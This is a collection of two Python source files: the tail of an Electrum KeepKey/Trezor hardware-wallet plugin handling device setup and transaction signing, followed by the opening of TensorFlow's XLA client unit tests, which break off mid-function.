"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.daemon = True
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in ('standard',):
raise ScriptTypeNotSupported(_('This type of script is not supported with KeepKey.'))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.is_segwit())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
segwit = wallet.keystore.is_segwit()
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, segwit=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
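# Note (added): the default nSequence of 0xfffffffe keeps nLockTime enforceable
# without signalling BIP125 replace-by-fee.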
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, segwit=False):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = b58_address_to_hash160(address)
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
if is_segwit_address(address):
txoutputtype.script_type = self.types.PAYTOWITNESS
else:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == NetworkConstants.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == NetworkConstants.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise BaseException('addrtype: ' + str(addrtype))
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
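# ---------------------------------------------------------------------------
# Illustrative sketch (added; not part of the original plugin). It only shows
# how the derivation strings used by sign_message / show_address above are
# assembled before being passed to client.expand_path. The helper name
# example_address_path is hypothetical, and "m/44'/0'/0'" is just a sample
# prefix; the real prefix comes from keystore.get_derivation().
def example_address_path(derivation_prefix, sequence):
    # `sequence` is a (change, index) pair, e.g. (0, 5) for the sixth receiving address.
    return derivation_prefix + "/%d/%d" % sequence

# example_address_path("m/44'/0'/0'", (0, 5)) -> "m/44'/0'/0'/0/5"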
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
from absl.testing import absltest
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
class ComputationTest(absltest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
return xla_client.execute_with_python_values(compiled_c, arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol), c,
arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(absltest.TestCase):
def ExampleComputation(self):
builder = xla_client.ComputationBuilder("acomputation")
p0 = builder.ParameterFromNumpy(np.float32(0))
p1 = builder.ParameterFromNumpy(np.zeros((4,), np.float32))
builder.Mul(p0, p1)
return builder.Build()
def testComputationToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.GetHloText()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testComputationToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = computation.GetHloDotGraph()
self.assertTrue(hlo_dot_graph.startswith("digraph "))
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumS8(self):
c = self._NewComputation()
c.Add(c.Constant(np.int8(1)), c.Constant(np.int8(2)))
self._ExecuteAndCompareExact(c, expected=np.int8(3))
def testConstantScalarSumF32(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF16(self):
c = self._NewComputation()
c.Mul(
c.Constant(np.array([2.5, 3.3, -1.2, 0.7], np.float16)),
c.Constant(np.array([-1.2, 2, -2, -3], np.float16)))
self._ExecuteAndCompareClose(
c, expected=np.array([-3, 6.6, 2.4, -2.1], np.float16), rtol=2e-3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])), c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(
c.Constant(NumpyArrayS32([-2])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(
c.Constant(NumpyArrayS32([-1])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
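# Note (added): broadcast_dimensions=(d,) maps the 1D operand's only axis onto
# axis d of the 2D operand. In numpy terms the dim-1 cases above match default
# broadcasting, a + v (i.e. v[np.newaxis, :]), while the dim-0 cases correspond
# to a + v[:, np.newaxis].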
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
arg_buffers = [xla_client.Buffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)], expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().Compile()
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertEmpty(pieces)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
local_buffer = xla_client.Buffer.from_pyval(t)
# Run the test twice to verify that the original tuple buffer remains valid
# even after destructuring.
for _ in range(2):
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertLen(got, 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testMakeTuple(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
b0 = xla_client.Buffer.from_pyval(t[0])
b1 = xla_client.Buffer.from_pyval(t[1])
btup = xla_client.Buffer.make_tuple([b0, b1], device=0)
pieces = btup.destructure()
self.assertLen(pieces, 2)
array0, array1 = pieces
np.testing.assert_equal(
np.array([1, 2, 3, 4], dtype=np.float32), array0.to_py())
np.testing.assert_equal(
np.array([2, 3, 4, 5], dtype=np.int32), array1.to_py())
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.Buffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = xla_client.Buffer.from_pyval(arg0)
arg1_buffer = xla_client.Buffer.from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8)
for device in xla_client.get_local_backend().local_devices():
buf = xla_client.Buffer.from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
def testInvalidDevice(self):
t = np.array(1.)
with self.assertRaisesRegexp(
RuntimeError,
r"PyLocalBuffer::FromLiterals got bad device_ordinal: 100 "
r"\(num_local_devices=\d+\)"):
# TODO(skyewm): figure out how to test this with a Device
xla_client.Buffer.from_pyval(t, device=100)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As few additional ops as possible are added
around the op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.PrimitiveType.PRED,
np.int32: xla_client.PrimitiveType.S32,
np.int64: xla_client.PrimitiveType.S64,
np.float32: xla_client.PrimitiveType.F32,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.PrimitiveType.S32,
np.float32: xla_client.PrimitiveType.F32,
}
xla_x64_types = {
np.int64: xla_client.PrimitiveType.S64,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
